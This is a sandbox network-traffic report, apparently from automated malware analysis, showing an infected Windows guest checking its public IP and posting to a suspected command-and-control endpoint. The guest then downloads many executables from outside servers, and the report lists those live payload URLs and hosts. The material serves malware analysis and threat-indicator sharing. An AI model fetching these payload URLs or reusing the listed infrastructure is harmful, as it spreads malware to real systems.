Network Analysis
IP Address | Status | Action |
---|---|---|
104.192.140.26 | Active | Moloch |
104.237.62.213 | Active | Moloch |
104.26.4.15 | Active | Moloch |
104.26.9.59 | Active | Moloch |
108.61.198.52 | Active | Moloch |
147.45.44.104 | Active | Moloch |
147.45.45.69 | Active | Moloch |
164.124.101.2 | Active | Moloch |
176.111.174.109 | Active | Moloch |
176.113.115.33 | Active | Moloch |
185.215.113.37 | Active | Moloch |
194.116.215.195 | Active | Moloch |
34.117.59.81 | Active | Moloch |
45.91.200.135 | Active | Moloch |
80.66.75.114 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.140.25 | |
api64.ipify.org | 104.237.62.213 | |
ipinfo.io | 34.117.59.81 | |
api.myip.com | 104.26.9.59 | |
db-ip.com | 104.26.5.15 | |
240922164748184.tyr.zont16.com | 179.43.188.227 | |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.103:49183 | 104.192.140.26:80 | bitbucket.org |
192.168.56.103:49184 | 104.192.140.26:80 | bitbucket.org |
192.168.56.103:49185 | 104.192.140.26:80 | bitbucket.org |
192.168.56.103:49187 | 104.192.140.26:443 | bitbucket.org |
192.168.56.103:49189 | 104.192.140.26:443 | bitbucket.org |
192.168.56.103:49190 | 104.192.140.26:443 | bitbucket.org |
192.168.56.103:49167 | 104.237.62.213:443 | api64.ipify.org |
192.168.56.103:49168 | 104.237.62.213:443 | api64.ipify.org |
192.168.56.103:49171 | 104.26.4.15:443 | db-ip.com |
192.168.56.103:49172 | 104.26.9.59:443 | api.myip.com |
192.168.56.103:49188 | 108.61.198.52:80 | 240922164748184.tyr.zont16.com |
192.168.56.103:49178 | 147.45.44.104:80 | |
192.168.56.103:49180 | 147.45.44.104:80 | |
192.168.56.103:49176 | 147.45.45.69:80 | |
192.168.56.103:49177 | 147.45.45.69:80 | |
192.168.56.103:49181 | 176.111.174.109:80 | |
192.168.56.103:49179 | 176.113.115.33:80 | |
192.168.56.103:49182 | 185.215.113.37:80 | |
192.168.56.103:49174 | 194.116.215.195:80 | |
192.168.56.103:49169 | 34.117.59.81:443 | ipinfo.io |
192.168.56.103:49170 | 34.117.59.81:443 | ipinfo.io |
192.168.56.103:49166 | 45.91.200.135:80 | |
192.168.56.103:49173 | 45.91.200.135:80 | |
192.168.56.103:49175 | 80.66.75.114:80 | |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:137 | 192.168.56.103:137 |
192.168.56.103:50800 | 164.124.101.2:53 |
192.168.56.103:52760 | 164.124.101.2:53 |
192.168.56.103:53673 | 164.124.101.2:53 |
192.168.56.103:56613 | 164.124.101.2:53 |
192.168.56.103:62576 | 164.124.101.2:53 |
192.168.56.103:64894 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:49154 | 239.255.255.250:1900 |
8.8.8.8:53 | 192.168.56.103:62576 |
HTTP Requests

GET 200 https://db-ip.com/demo/home.php?s=
Request:
GET /demo/home.php?s= HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: db-ip.com
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
x-iplb-request-id: AC453FA3:8F6A_93878F2E:0050_66F37068_27E3B16C:7B63
x-iplb-instance: 59128
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2XZBr5DXf8Eg9ub%2BtlkI3012iPpuyECUCj9cWqmuogY9wkzFKPWPHU3goeNpzVmeWyExeCw7ZXm%2FmSO%2Bt6lmwEAzH%2FaYuLcmUVkHRLQI4UnHVEGMSoTtwKUGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c87762b58f0962b-KIX

GET 200 https://api.myip.com/
Request:
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: api.myip.com
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyU7hXw1zwUK9paJEEYI0iUBbkExMOqZiBOtf47uN8UyfRCWsS4CAoSYZgYMA%2BmeQrlt9SFs7%2BHOHqAuBYNrYh09CIyokHqlpny98KRgxgs1ty6Tj0CE%2BQ9Bv%2FWe5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c877644e8ad9659-KIX

GET 200 http://45.91.200.135/api/wp-ping.php
Request:
GET /api/wp-ping.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 45.91.200.135
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

POST 200 http://45.91.200.135/api/wp-admin.php
Request:
POST /api/wp-admin.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 133
Host: 45.91.200.135
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

POST 200 http://45.91.200.135/api/wp-admin.php
Request:
POST /api/wp-admin.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 133
Host: 45.91.200.135
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 2456
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

HEAD 200 http://194.116.215.195/File.exe
Request:
HEAD /File.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 194.116.215.195
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 374272
Last-Modified: Tue, 24 Sep 2024 18:04:20 GMT
Connection: keep-alive
ETag: "66f2ff24-5b600"
Accept-Ranges: bytes

HEAD 200 http://80.66.75.114/dl?name=inte
Request:
HEAD /dl?name=inte HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 80.66.75.114
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="inte.exe";
Content-Type: application/octet-stream

HEAD 200 http://147.45.45.69/sdsdhggf.exe
Request:
HEAD /sdsdhggf.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 334376
Last-Modified: Wed, 25 Sep 2024 00:19:12 GMT
Connection: keep-alive
ETag: "66f35700-51a28"
Accept-Ranges: bytes

HEAD 200 http://147.45.45.69/vdcsb.exe
Request:
HEAD /vdcsb.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:10 GMT
Connection: keep-alive
ETag: "66f356fe-64e28"
Accept-Ranges: bytes

HEAD 200 http://147.45.44.104/revada/66f3128883969_crypted.exe#1
Request:
HEAD /revada/66f3128883969_crypted.exe#1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 324608
Last-Modified: Tue, 24 Sep 2024 19:27:04 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31288-4f400"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

HEAD 200 http://176.113.115.33/thebig/noode.exe
Request:
HEAD /thebig/noode.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.113.115.33
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3108923
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Description: File Transfer
Content-Disposition: attachment; filename=noode.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public

HEAD 200 http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
Request:
HEAD /yuop/66f32080436ad_deepweb.exe#deep HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 97792
Last-Modified: Tue, 24 Sep 2024 20:26:40 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f32080-17e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

HEAD 200 http://176.111.174.109/kurwa
Request:
HEAD /kurwa HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.111.174.109
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 25 Sep 2024 02:07:50 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
Content-Disposition: attachment; filename="IJXMh9myGw.exe"
Server-Timing: total;dur=18.9;desc="Total Response Time"
content-transfer-encoding: Binary

HEAD 200 http://185.215.113.37/vera/nate.exe
Request:
HEAD /vera/nate.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 185.215.113.37
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Sep 2024 02:06:32 GMT
ETag: "5d800-622e812287929"
Accept-Ranges: bytes
Content-Length: 382976
Content-Type: application/x-msdos-program

GET 200 http://176.111.174.109/kurwa
Request:
GET /kurwa HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.111.174.109
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 25 Sep 2024 02:07:51 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Content-Disposition: attachment; filename="1VheuyPhaA.exe"
Server-Timing: total;dur=1.9;desc="Total Response Time"
content-transfer-encoding: Binary

GET 200 http://176.113.115.33/thebig/noode.exe
Request:
GET /thebig/noode.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 176.113.115.33
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3108923
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Content-Description: File Transfer
Content-Disposition: attachment; filename=noode.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public

GET 200 http://185.215.113.37/vera/nate.exe
Request:
GET /vera/nate.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 185.215.113.37
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Sep 2024 02:06:32 GMT
ETag: "5d800-622e812287929"
Accept-Ranges: bytes
Content-Length: 382976
Content-Type: application/x-msdos-program

GET 200 http://147.45.45.69/sdsdhggf.exe
Request:
GET /sdsdhggf.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 334376
Last-Modified: Wed, 25 Sep 2024 00:19:12 GMT
Connection: keep-alive
ETag: "66f35700-51a28"
Accept-Ranges: bytes

GET 200 http://147.45.45.69/vdcsb.exe
Request:
GET /vdcsb.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:10 GMT
Connection: keep-alive
ETag: "66f356fe-64e28"
Accept-Ranges: bytes

HEAD 200 http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
Request:
HEAD /malesa/66f31d151f82e_lyla34.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 253952
Last-Modified: Tue, 24 Sep 2024 20:12:05 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31d15-3e000"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

HEAD 200 http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
Request:
HEAD /lopsa/66f18e5598f87_kaloa.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 3229696
Last-Modified: Mon, 23 Sep 2024 15:50:45 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f18e55-314800"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

GET 200 http://194.116.215.195/File.exe
Request:
GET /File.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 194.116.215.195
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 374272
Last-Modified: Tue, 24 Sep 2024 18:04:20 GMT
Connection: keep-alive
ETag: "66f2ff24-5b600"
Accept-Ranges: bytes

GET 200 http://80.66.75.114/dl?name=inte
Request:
GET /dl?name=inte HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 80.66.75.114
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 02:07:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="inte.exe";
Content-Length: 325120
Content-Type: application/octet-stream

HEAD 200 http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
Request:
HEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 11496960
Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66ea6451-af6e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

GET 200 http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
Request:
GET /yuop/66f32080436ad_deepweb.exe#deep HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:52 GMT
Content-Type: application/octet-stream
Content-Length: 97792
Last-Modified: Tue, 24 Sep 2024 20:26:40 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f32080-17e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

HEAD 404 http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
Request:
HEAD /f/fikbam0922184.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 240922164748184.tyr.zont16.com
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
Date: Wed, 25 Sep 2024 02:07:53 GMT

GET 200 http://147.45.44.104/revada/66f3128883969_crypted.exe#1
Request:
GET /revada/66f3128883969_crypted.exe#1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Type: application/octet-stream
Content-Length: 324608
Last-Modified: Tue, 24 Sep 2024 19:27:04 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31288-4f400"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

GET 404 http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
Request:
GET /f/fikbam0922184.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 240922164748184.tyr.zont16.com
Cache-Control: no-cache
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Length: 17

GET 200 http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
Request:
GET /malesa/66f31d151f82e_lyla34.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:53 GMT
Content-Type: application/octet-stream
Content-Length: 253952
Last-Modified: Tue, 24 Sep 2024 20:12:05 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f31d15-3e000"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes

HEAD 200 http://147.45.45.69/vdcsnjdh15.exe
Request:
HEAD /vdcsnjdh15.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Content-Length: 0
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:11 GMT
Connection: keep-alive
ETag: "66f356ff-64e28"
Accept-Ranges: bytes

GET 200 http://147.45.45.69/vdcsnjdh15.exe
Request:
GET /vdcsnjdh15.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.45.69
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 00:19:11 GMT
Connection: keep-alive
ETag: "66f356ff-64e28"
Accept-Ranges: bytes

GET 200 http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
Request:
GET /lopsa/66f18e5598f87_kaloa.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 147.45.44.104
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Sep 2024 02:07:54 GMT
Content-Type: application/octet-stream
Content-Length: 3229696
Last-Modified: Mon, 23 Sep 2024 15:50:45 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f18e55-314800"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 104.26.4.15:443 | C=US, O=Google Trust Services, CN=WR1 | CN=db-ip.com | e0:87:2e:81:a3:0e:fe:55:82:41:57:b8:ff:b2:84:42:af:47:01:7c |
TLSv1 192.168.56.103:49172 104.26.9.59:443 | C=US, O=Google Trust Services, CN=WR1 | CN=myip.com | b3:80:cf:15:df:f5:53:6f:d4:e4:88:68:de:87:c0:e1:f8:3b:2c:02 |
Snort Alerts
No Snort Alerts